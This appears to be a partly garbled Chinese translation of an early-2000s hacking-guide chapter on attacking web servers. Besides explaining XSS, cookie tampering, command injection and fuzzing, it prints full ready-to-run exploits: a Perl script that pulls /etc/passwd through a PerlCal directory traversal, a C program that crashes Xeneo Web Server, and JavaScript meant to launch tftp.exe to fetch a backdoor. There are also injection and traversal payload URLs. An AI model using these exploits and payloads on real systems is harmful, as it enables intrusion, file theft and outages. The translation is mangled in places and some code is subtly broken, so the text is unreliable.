黑客將研究最普通最廣泛使用的web服務方面的東西,想找遠程的可利用的漏洞來獲得root或者是完全登陸權限。這樣做的原因是因爲,當找到一個遠程的可利用的bug,就可以讓黑客可以在如果不是上萬至少也是上千的機器組成的主機上使用惡意代碼。
Web 應用程序的演變
在今天的Internet 環境中,它是一個由分散在全球的不同的技術,協議和操作系統的混合體。通過使用這種混和體,這就可能使應用程序相互交流造成障礙。
Web 應用軟件有着對用戶和開發者異常強大的潛力,但是他們也能成爲安全和系統管理的噩夢,大部分web服務編碼於迂迴某種現存的安全執行程序,支持某些應用程序稱爲結構,並且也不獨立與自身的平臺上。大部分公和其他的開發者寫代碼急於配置和應用web服務。這就就是爲什麼有這麼多漏洞可以在這些代碼中被發現,這些漏洞使顧客和系統用戶暴露在攻擊之下。
大多數web應用程序是連續的具有更多的功能性和分配更多的伸縮功能,這在代碼中的增加了許多潛在的漏洞。 公司指望利用形成的技術來獲得競爭優勢,但是他們應該能夠有把握在產品賣給公衆以前有一個安全專家查看這些代碼。這將有助於避免黑客在應用程序中發現遠程的或者本地的漏洞bug的可能性。大多數web攻擊是在應用程序這一層。黑客不需要廣泛的知識來獲得登錄到本地網絡或者是一個獨立的系統
表請看1-1;這是一個小的典型的web應用程序的技術總計
表 1-1 web 應用程序技術
Table 1-1 Web Application Technologies
軟件 技術
Vendor TechnologiesSun Microsystems Java 2 Enterprise EditionBEA WeblogicIBM WebsphereMicrosoft javascript, ASP.NET, ISAPI, Common Object Model (COM), Active Server Pages (JSP) Apache Jakarta (server-site Java) and PHPGeneric HTML, Perl and CGI
Web 開發的演變
隨着web應用軟件形式的發展,web開發也得到長足的發展,從一個很基本的目錄表到遠程可利用的緩衝溢出,許多公司努力找到他們能作到的方式來寫安全代碼,但是黑客也不斷的在尋找新的、更復雜的方法來找到bug和利用他們的方法
惡意的對象:Java/ActiveX Objects
Java and javascript
Java objects或者是applets是Sun微系統上的用java程序語言代碼編寫的小應用程序,java是一種面向對象的語言。它能把所有的元素當作對象處理,java 編碼和風狀在一個叫.class的文件中,這個文件存儲在web服務器中,當在另外一種語言的web客戶端上,它的代碼不會被泄露。Java是當今最有優勢的用於internet開發工具之一,java爲開發者提供可移植的代碼,開發者的開發可以在客戶段可通過web執行。
另外黑客盯上的一種途徑,就是利用javascript,javascript是種腳本語言,它能應用在許多服務器段和客戶端應用程序中。
javascript 主要用於接受用戶的輸入,並且把其他的一些組件捆綁在一起。最主要的web瀏覽器都內建了javascript引擎,它能接受這些無格式的javascript文本代碼,並在客戶段將突發的指令翻譯。下面是一個非常基本的javascript例子,它展示了當一個按鈕被點擊時的popup box
Example: javascript Popup Box
1<html>
2 <head>
3<title>Basic javascript Example</title>
4<script language=javascript”>
5<!—hide for javascript challenged browsers
6
7function popup1()
8{
9
10 alert(“Hello World!”);
11
12}
13
14</script>
15 </head>
16<h1 align=center>Basic javascript Example</h1>
17<div align=center>
18 <form>
19<input type=”button” value=”Hello World!” οnclick=”popup1()”>
20</form>
上面的例子是讓你熟悉這種語言的,並且讓你知道當web黑時應該如何知道。
因爲javascript是在客戶端執行的,一個黑客就能通過輸入可以執行的非標準的數據來導致應用程序輸出敏感的信息或者導致應用程序崩潰。
下面是一個惡意javascript的利用實例,javascript將在客戶端的本地機器上執行tftp.exe這個程序。
Example: Execute TFTP Client
21<html>
22 <head>
23
24<title>Execute tftp.exe</title>
25<script language=javascript”>
26<!—hide for javascript challenged browsers
27
28var popup1 = window.createPopup();
29
30function popup2()
31{
32
33 var popUpBody = popup2.document.body;
34 popUpBody.innterHTML = ‘<OBJECT NAME=”X”
35 CLASSID=CLSID:11111111-1111-1111-1111-111111111111”
36 CODEBASE=”C:/Windows/system32/tftp.exe”>
37 </OBJECT>’;
38 popup2.show(390, 290, 300, 300, document.body);
39
40}
41
42</script>
43
44<P οnclick=openpopup2();><U><fontcolor=#BBBBB>TFTP</font></U></P>
通過下面的代碼,當點擊“TFTP”連接時,就在遠程系統上面打開TFTP (Trivial Transfer File Protocol)客戶端。一旦TFTP通過,TFTP客戶端就能下載一些惡意代碼,例如後門程序,使黑客可以獲得完全登錄系統權限
ActiveX
微軟已經發明他自己的客戶端腳本模式,這種模式通常稱爲ActiveX. ActiveX是另外兩種稱爲COM和OLE 技術的副產品。不象javascript, ActiveX有完全登陸操作系統的權限,這就是爲什麼微軟開發一個註冊系統的原因,這樣,可戶的瀏覽可以被識別並且在執行他以前授權給一個ActiveX 控件
典型的web應用程序
跨區域腳本
Cross-Site Scripting
跨區域腳本攻擊是當今最平常的安全問題之一。今天絕大部分web站點包含了許多動態的目錄,使站點看起來更適合用戶。Web應用程序被用來完成和分發不同類型的輸出到用戶,這些輸出依賴於web瀏覽器的設置。動態web站點有而靜態web站點沒有的威脅,它被稱爲”跨區域腳本”
當一個web應用程序從客戶端蒐集敏感或者是惡意的數據,這就是大家知道的一個跨區域腳本攻擊。通常,這些數據包含在一個包含有惡意代碼在裏面的超級連接的表單裏,黑客就可以利用用戶點擊一個惡意連接到一個email.及時消息,論壇帖子或者是一個web站點。一旦數據從web應用程序蒐集,它將產生一個原先發送給它的包含有惡意數據的頁面給用戶,但是在某種程度上使他看起來象它是從正確站點來的有效內容。
一個跨區域腳本攻擊的實例
如果一個web站點或者是web服務器,沒有檢測腳本代碼並且把它逐字的發送回用戶的瀏覽器,這是當致命的破壞產生時的情況。黑客能使用跨區域腳本的弱點來獲得一個用戶的cookies,登陸的詳細清單和其他的敏感信息。
有幾種產品遭受跨區域腳本攻擊,它們都容許黑客使用java Servlet容器來發回惡意的javascript代碼。這就容許黑客建構跨區域腳本攻擊,在用戶想要從信任的服務器上接收惡意腳本代碼
下面是幾個老的容易受到跨區域腳本攻擊的web服務器
Resin 1.2.2:
http://www.targeted_host/<SCRIPT>alert(documents.cookie)</SCRIPT>.jsp
WebSphere 3.02:
http://www.targeted_host/<SCRIPT>alert(documents.cookie)</SCRIPT>.jsp
JRun 3.0:
http://www.targeted_host/<SCRIPT>alert(documents.cookie)</SCRIPT>.shtml
These pages will produce the following output:
Message: File not found: file://
StackTrace: com.ibm.servlet.engine.webapp.WebAppErrorReport: File not found: file://******
at javax.servlet.ServletException.<init>(ServletException.java:107)
at com.ibm.websphere.servlet.error.ServletErrorReport.<init>(ServletErrorReport.java:31)
at com.ibm.servlet.engine.webapp.WebAppErrorReport.<init>(WebAppErrorReport.java:20)
at com.ibm.servlet.engine.webapp.WebAppDispatcherResponse.sendError(WebAppDispatcherResponse.java:97)
Coolkie 被操縱
Cookie 操作是一種形式的攻擊,這種攻擊,黑客能夠在客戶端和web應用程序之間修改特殊的數據,而不有意的直接存儲。這種形式的攻擊能夠用URL字符串,Cookies和表格區來完成,這種形式的攻擊就是大家所知道的man-in-the-middle攻擊。
Cookies 主要用於方便存儲用戶數據和參數,並且包含記號在其中。大多數的cookies能夠被用戶修改,而且能用一個不同的地址請求送回到服務器。有完全免費的工具完成這些任務。Cookie被操縱的範圍cookie所用於的方面有關。大多數的cookie用於
Most cookies are used for session tokens to a range of arrays that make authentication decisions.
大約90%的cookie是基於64位編碼的,下面是一個基本的,當一個瀏覽器接受一個http頭的例子。
Example: Set-Cookie
Set-Cookie: varUserName=c0nnie;&varUserID=TF7044959 expires=Thu, 19 July 2010 20:00:00 GMT; path=/; domain=.security-protocols.com
瀏覽器將把這些當作命令來解釋並且將它留下的值保存下到這頁中。所以,不論無論什麼時候,擁護從服務器請求一個頁面,它將包含下面這些作爲額外數據的cookie防在http的頭部。下面是一個http頭的例子,它是當用戶已經登陸了以後被web應用程序送回的
Cookie: varUserName=c0nnie;&varUserID=TF7044959
就象你能夠從這個例子看到的,cookie用於保留我們的登陸id的記錄。這就是好的方法——經常將所有你的cookie從你當地機器中刪除的原因。Cookie是一個基於要被送回服務器的無格式文本輸入很明白無誤,它應該被輕易的改變。所以你要思考,通過操縱一個cookie,一個黑客能夠獲得什麼。
示例的cookie是很直接並且很容易利用,就象你能夠看到的,用戶ID的值框是我們應當嘗試和改變的。一旦我改變它的值,並且從新登陸到服務器,我就能獲得” Welcome Phil”這樣的消息。看起來就象我們已經儲存了另外一個用戶的登陸和使用的帳號。所以,我敢打賭,你很驚訝爲什麼web應用程序知道用戶的ID 爲TF7044959的名字是Phil?我們站點,Phil更本就沒有登陸,所以,它必需已經象一個數據庫一樣儲存在系統之中
找到可以利用的漏洞的技巧
Techniques for Finding and Exploiting Vulnerabilities
Web servers have always been the easiest way for a hacker to get into a internal network, or just to compromise systems exposed on the Internet. As we were saying in the beginning of this chapter, web applications are normally coded as fast as possible and the thought of coding securely never enters the mind of the programmers. They are numerous ways of finding vulnerabilities in web servers. In the next few sections will have examples of common fingerprints which are used in exploitation of both web servers and web applications.
Basic Exploitation Techniques
‘<?’ Method
The ‘<?’ method can be used to insert PHP into a remote web application. It is possible to execute arbitrary commands on a remote server using this technique. Below is an example on how it can be used.
Example: <?
http://target_host/webapp.php=<?passthru("id");?>
On some PHP applications, this may allow the command to be executed locally on the remote host under the user the web server is running as.
‘;’ Method
The ‘;’ character allows multiple commands to be executed on a UNIX or Linux machines.
Example: ‘;’
[root@c0nnie]# id;uname –a uid=0(root) gid=0(root) groups=0(root) Linux c0nnie 2.4.19-16mdk #1 Fri Sep 20 18:15:05 CEST 2002 i686 unknown unknown GNU/Linux
This technique is often used to execute multiple commands on a web server in order to gain sensitive information.
‘|’ Method
The pipe character is often used in UNIX or Linux system to help execute multiple commands at a time in one single request.
Example: ‘|’
http://target_host/foobar.pl?page=../../../../bin/ls%20-al%20/home|
The following request will give a full directory listing of the ‘home’ directory on the targeted host.
‘%00’ Method
The %00 is the hex value of a null byte. This can be used to trick a web application into thinking that a different file type is being requested.
Example: ‘%00’
http://target_host/foobar.pl?page=../../../../etc/passwd
By making this request, the web application will disallow this request because it is checking for a valid file name like .asp, .html or any other type of file extension.
http://target_host/foobar.pl?page=../../../etc/passwd%00html
Now with this request, it tricks the web application into thinking that the filename ends in one of its file types. This is a very common problem in web applications.
‘%20’ Method
The %20 is the hex value for a blank space. This request can be used to help you execute commands on the host. See the example below.
Example: ‘%20’
http://target_host/foobar.pl?page=uname%20-a|
The following example above will output the ‘uname –a’ command on a UNIX or Linux system. This may allow for an attacker to see what type of operating system the host is running. Or, this method can be used with other types of variations of choice.
Directory Traversal Vulnerabilities
A directory traversal is when a web application and or web server does not filter out bad characters which are sent by a hacker. A hacker can send a bad request resulting in the disclosure of directories and files outside the normal bounding HTTP root directory.
PerlCal cal_make.pl Directory Traversal
Back in April 2001 a guy by the name of Stan a.k.a The Pike found a directory traversal in PerlCal cal_make.pl. PerCal is a web scheduler/calendar server which is managed by CGI scripts. This particular vulnerability allows anyone to download any file on the local system. Below is an example HTTP request to do so.
Example: ‘cal_makel.pl’
http://target_host/ /cgi-bin/cal_make.pl?p0=../../../../../../../../../../../../etc/passwd%00
The following request will retrieve the local system passwd which contains all the user accounts on system. Now if this is an older system, the passwd may not be shadowed making it easy to crack. I coded a very simple exploit for this vulnerability below.
PerlCal cal_make.pl Exploit
1#!/usr/bin/perl
2# PerlCal cal_make.pl directory traversal
3# this vuln was found by: Stan a.k.a. ThePike
4#
5# Vulnerable systems:
6# PerlCal version 2.95 and prior (UNIX)
7#
8# Written by tommy <[email protected]>
9# For Security-Protocols Research Labs
10# 09/09/02
11#
12# usage:
13# perl sp-perlcal.pl targeted_host /etc/passwd or /proc/version
14#
15#
16################
17
18use IO::Socket;
19use strict;
20
21print "-"x74;
22print "/nPerlCal cal_make.pl directory traversal, tommy/@security-protocols.com/n";
23print "-"x74;
24print "/n/n";
25
26my $host = $ARGV[0];
27my $port = 80;
28my $fuxor = "/etc/passwd%00";
29my $lin;
30my @thedata;
31
32($ARGV[1]) && ($fuxor = $ARGV[1]."%00");
33
34print "w0rking on getting $fuxor from $host/n";
35
36my $tcpval = getprotobyname('tcp');
37my $serverIP = inet_aton($host);
38my $serverAddr = sockaddr_in(80, $serverIP);
39my $protocol_name = "tcp";
40
41my $iaddr = inet_aton($host) || die print("host was not found: $host");
42my $paddr = sockaddr_in($port, $iaddr) || die print("you did something wrong stupid... exiting...");
43my $proto = getprotobyname('tcp') || die print("cannot get protocol");
44socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die print("socket could not open: $!");
45connect(SOCK, $paddr) || die print("cannot connect: $!");
46
47my $submit = "GET /cgi-bin/cal_make.pl?p0=../../../../../../../../../../../..$fuxor/n/n";
48send(SOCK,$submit,0);
49@thedata=<SOCK>;
50
51close (SOCK);
52
53foreach $lin(@thedata)
54{
55print "$lin";
56}
57
58print "/n-----------------------------------EOF------------------------------------/n/n";
Web Server and Web Application Vulnerability Scanning Software
We present this in section some tools which can be used to identify web server software vulnerabilities. We have used, and evaluated almost all web server vulnerability scanners and the following seem to be the best to use.
Nikto
Nikto is a web server vulnerability scanner written by Chris Sullo. Nikto performs comprehensive testing against web servers for multiple vulns including misconfigurations, insecure or default files and scripts and over 130 versions of servers. We feel that this is the best available free web server scanner out there. Nikto uses RFP’s Lib Whisker as a base for all socket functionality. Some of Nikto’s main features are; multiple IDS invasion techniques, SSL support, and Perl plug-in support.
Nikto has so many checks, and can scan so fast that it will overwhelm smaller web servers, and will defiantly be seen in intrusion detection logs and web server logs. There is an IDS invasion option which can be used. The best thing about this tool is that you code your own plug-ins if you want.
Whisker
Well the much long anticipated version 2.1 of Whisker has been released. Whisker is a very robust scanning tool. The main function of Whisker is to scan web server for files on remote web servers. Whisker was introduced in the earlier days when most bugs were associated with CGI scripts that had known vulnerabilities that could be exploited. Below we will demonstrate this by showing you how Whisker works. Please note that Whisker is a Perl script, so make sure you have Perl installed.
Whisker comes with a set of database files which the scan engine takes as its primary configuration file. The included database files tell Whisker what directories to look for, what files to look for and a few other things like how web servers react to certain requests. Here is how to run Whisker against a host:
[tf0ne@c0nnie tf0ne]$ perl -h http://target_host.com/
-----------------------------------------------------------------------
Title: Notice
Whisker scans for CGIs by checking to see if the server says a particular URL exists. However, just because a URL exists does not necessarily mean it is vulnerable/exploitable--the vulnerability might be limited to only a certain version of the CGI, and the server might not be using the vulnerable version. There is also the case where many scripts use the same generic CGI name (like count.cgi); in this case, the exact CGI being used may not be the same one that contains the vulnerability.
Thus, the actual vulnerability of the CGI must be verified in order to get a true assessment of risk. Whisker only helps in pointing out the problem areas. The next step after scanning with whisker is to review each found CGI by reviewing the reference URLs or searching for the CGI name on SecurityFocus.com or Google.com.
-----------------------------------------------------------------------
Beginning scan against http://www.target_host.com
----------------------------------------------------------------------
Whisker is currently crawling the website; please be patient.
-----------------------------------------------------------------------
Title: Server banner
Id: 100
Severity: Informational
The server returned the following banner:
Microsoft-IIS/5.0
-----------------------------------------------------------------------
Whisker is done crawling the website.
-----------------------------------------------------------------------
Title: Server banner
Id: 100
Severity: Informational
The server returned the following banner:
Microsoft-IIS/5.0
-----------------------------------------------------------------------
Title: Server OPTIONS results
Id: 109
Severity: Informational
The server responded to an OPTIONS query with the following public methods:
OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOC, UNLOCK, SEARCH
The allowed methods for '/' are:
OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
-----------------------------------------------------------------------
Title: Server patch level
Id: 111
Severity: Informational
Testing indicates server patch level to be at or after the following level: Win2K IIS-SRP1 (MS02-018) or SP3
-----------------------------------------------------------------------
Title: viewcode.asp
Id: 621
Bid: 167
Cve: 1999-0736
Found URL: /sites/samples/knowledge/membership/inspired/viewcode.asp
No specific information is provided for this item.
References:
http://online.securityfocus.com/bid/167
http://cve.mitre.org/cgi-bin/cvename.cgi?name=1999-0736
-----------------------------------------------------------------------
Title: viewcode.asp
Id: 622
Bid: 167
Cve: 1999-0736
Found URL: /sites/samples/knowledge/membership/inspiredtutorial/viewcode.asp
No specific information is provided for this item.
References:
http://online.securityfocus.com/bid/167
http://cve.mitre.org/cgi-bin/cvename.cgi?name=1999-0736
-----------------------------------------------------------------------
Title: viewcode.asp
Id: 624
Bid: 167
Cve: 1999-0736
Found URL: /sites/samples/knowledge/push/viewcode.asp
No specific information is provided for this item.
References:
http://online.securityfocus.com/bid/167
http://cve.mitre.org/cgi-bin/cvename.cgi?name=1999-0736
-----------------------------------------------------------------------
Title: viewcode.asp
Id: 627
Found URL: /siteserver/publishing/viewcode.asp
No specific information is provided for this item.
-----------------------------------------------------------------------
Title: Encountered cookies
Severity: Informational
The following cookies were encountered while scanning:
ASPSESSIONIDSCQATDSA=POKECCICFCJFEMDBHHMKLFIG; path=/
-----------------------------------------------------------------------
Whisker scan completed in 1 minute.
After looking over the output, Whisker has found several potentially exploitable files and directories on this Microsoft IIS 5.0 system. The nice thing about Whisker 2.1 is that it provides URL links, and detailed information of the files it has found. Whisker is a very powerful tool that is easy to use for anyone. We hope that RFP continues to support this great tool.
Shadow Security Scanner
One of the newer and very impressive vulnerability scanners is Shadow Security Scanner by Safety Lab. This is not just a web server scanner, but a full fledged vulnerability scanner. The latest version as of this writing is SSS 5.41.
Shadow Security Scanner was designed to identify known vulnerabilities, with suggest fixes to identified vulnerabilities, and also reports other security holes within the network. Shadow Security Scanner has very flexible policies on which audits to perform. There is a nice policy wizard which helps you specifically select which ports you wish to scan.
Figure1-1 Shadow Security Scanner
The reports that are produced after a scan are very detailed which makes it easy for any user to read, and act on found vulnerabilities within there network. Shadow Security Scanner has a very nice auto-update feature which allows you too update the scan modules on a daily basis. All though, this tool is not free it is defiantly worth a try if you are looking for a robust tool.
Blindly Fuzzing Web Servers for Vulnerabilities
I have had allot of success with fuzzing web servers and other applications for bugs. There are a few really good fuzzier tools out there. From my experience, SPIKE which was written by Dave Aitel has found numerous remotely exploitable bugs.
SPIKE
Spike 是一個API和一種用許你快速的創建網絡協議重點測試工具,Spike將使複製任何複雜的二進制協議變的飛快。最酷的事情是你可以在新的產品上測試舊的技術,對多數表住的web應用程序,SPIKE能快速發現緩衝器溢出,SQL injection bugs和format string bugs.我發現這對工作非常有用
通過perl腳本使用SPIKE’的框架有很多優點,
There are many advantages to using SPIKE’s framework over using Perl scripts. SPIKE integrates very well with libntlm and other GPL’ed libraries for doing encryption and or other types of things that you don’t have Perl modules.
SPIKE Programs for Web Applications
·generic_web_server_fuzz
·closed_source_web_server_fuzzer
·webfuzz.c
·webmitm
·ntlm2/ntlm_brute
Below I will show you how to run SPIKE using the closed_source_web_server_fuzz program against Xeneo Web Server 2.2.2.10.0. Lets see what we find!
[tf0ne@c0nnie src]$ ./closed_source_web_server_fuzz 192.168.1.103 80 GET / index .html 0 0
After about an hour of fuzzing, the closed_source_web_server_fuzz program segfaulted (meaning that it found a bug). After looking over the output from SPIKE, I found that the following GET request crashed the web server:
GET /index.html?testvariable=&nexttestvariable=gif HTTP/1.1
Referer: http://localhost/%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Content-Type: application/x-www-form-urlencoded
Connection: Keep-Alive
Cookie: VARIABLE=SPLABS; path=/
User-Agent: Mozilla/4.76 [en] (X11; U; Linux 2.4.2-2 i686)
Variable: result
Host: localhost
Content-length: 513
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8
whatyoutyped=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
現在,我們一個惡意包,我們可以很容易編寫利用代碼,下面的開發將再生這樣的漏洞
Xeneo Web Server 2.2.2.10.0 DoS Exploit
59/* Xeneo Web Server 2.2.2.10.0 DoS
60 *
61 * Vulnerable systems:
62 * Xeneo Web Server 2.2.10.0
63 * Vendor:
64 * http://www.northernsolutions.com
65 *
66 * Written and found by tommy <[email protected]>
67 * For SP Research Labs
68 * 04/23/2003
69 *
70 * www.security-protocols.com
71 *
72 * usage:
73 * sp-xeneo2 <targetip> [targetport] (default is 80)
74 */
75
76
77#include <winsock2.h>
78#include <stdio.h>
79
80#pragma comment(lib, "ws2_32.lib")
81
82char exploit[] =
83
84"GET /index.html?testvariable=&nexttestvariable=gif HTTP/1.1/r/n"
85"Referer: http://localhost/%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%"
86"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%"
87"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%"
88"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%"
89"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%"
90"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%"
91"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%"
92"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%"
93"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%"
94"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%/r/n"
95"Content-Type: application/x-www-form-urlencoded/r/n"
96"Connection: Keep-Alive/r/n"
97"Cookie: VARIABLE=SPLABS; path=//r/n"
98"User-Agent: Mozilla/4.76 [en] (X11; U; Linux 2.4.2-2 i686)/r/n"
99"Variable: result/r/n"
100"Host: localhost/r/n"
101"Content-length: 513/r/n"
102"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png/r/n"
103"Accept-Encoding: gzip/r/n"
104"Accept-Language: en/r/n"
105"Accept-Charset: iso-8859-1,*,utf-8/r/n/r/n/r/n"
106"whatyoutyped=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
107"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
108"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
109"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
110"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
111"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
112"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
113"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
114"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
115"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/r/n";
116
117int main(int argc, char *argv[])
118{
119WSADATA wsaData;
120WORD wVersionRequested;
121struct hostent *pTarget;
122struct sockaddr_in sock;
123char *target, buffer[30000];
124int port,bufsize;
125SOCKET mysocket;
126
127if (argc < 2)
128{
129printf("Xeneo Web Server 2.2.10.0 DoS/r/n <[email protected]>/r/n/r/n");
130printf("Tool Usage:/r/n %s <targetip> [targetport] (default is 80)/r/n/r/n");
131printf("www.security-protocols.com/r/n/r/n");
132exit(1);
133}
134
135wVersionRequested = MAKEWORD(1, 1);
136if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;
137
138target = argv[1];
139
140//for default web attacks
141port = 80;
142
143if (argc >= 3) port = atoi(argv[2]);
144bufsize = 512;
145if (argc >= 4) bufsize = atoi(argv[3]);
146
147mysocket = socket(AF_INET, SOCK_STREAM, 0);
148if(mysocket==INVALID_SOCKET)
149{
150printf("Socket error!/r/n");
151exit(1);
152}
153
154printf("Resolving Hostnames.../n");
155if ((pTarget = gethostbyname(target)) == NULL)
156{
157printf("Resolve of %s failed/n", argv[1]);
158exit(1);
159}
160
161memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
162sock.sin_family = AF_INET;
163sock.sin_port = htons((USHORT)port);
164
165printf("Connecting.../n");
166if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) )))
167{
168printf("Couldn't connect to host./n");
169exit(1);
170}
171
172printf("Connected!.../n");
173printf("Sending Payload.../n");
174if (send(mysocket, exploit, sizeof(exploit)-1, 0) == -1)
175{
176printf("Error Sending the Exploit Payload/r/n");
177closesocket(mysocket);
178exit(1);
179}
180
181printf("Remote Webserver has been DoS'ed /r/n");
182closesocket(mysocket);
183WSACleanup();
184return 0;
185}
你可以用Microsoft Visual Studio 6.0.來編譯這個漏洞
摘要
在這一章當中,我們已經學習了許多掃描和找出漏洞以及發現在web服務器應用程序弱點的方法,這樣做很重要,及時打上賣主的安全補丁,關閉web服務器上的一些功能,經常掃面出你自己網絡的漏洞。
參考書目
安全網址
http://security-protocols.com
http://eEye.com
http://packetstormsecurity.nl
http://astalavista.com
掃描工具
Niktohttp://www.cirt.net/code/nikto.shtml
Whisker http://www.wiretrip.net/rfp/
Shadow Security Scanner http://www.safety-lab.com
模糊工具
SPIKEhttp://www.immunitysec.com/spike.html
badpack3t
[email protected]
www.security-protocols.com
Copyright © 2000-2003 Security-Protocols Inc. All trademarks are property of their respective owners and are used here for entertainment purposes only.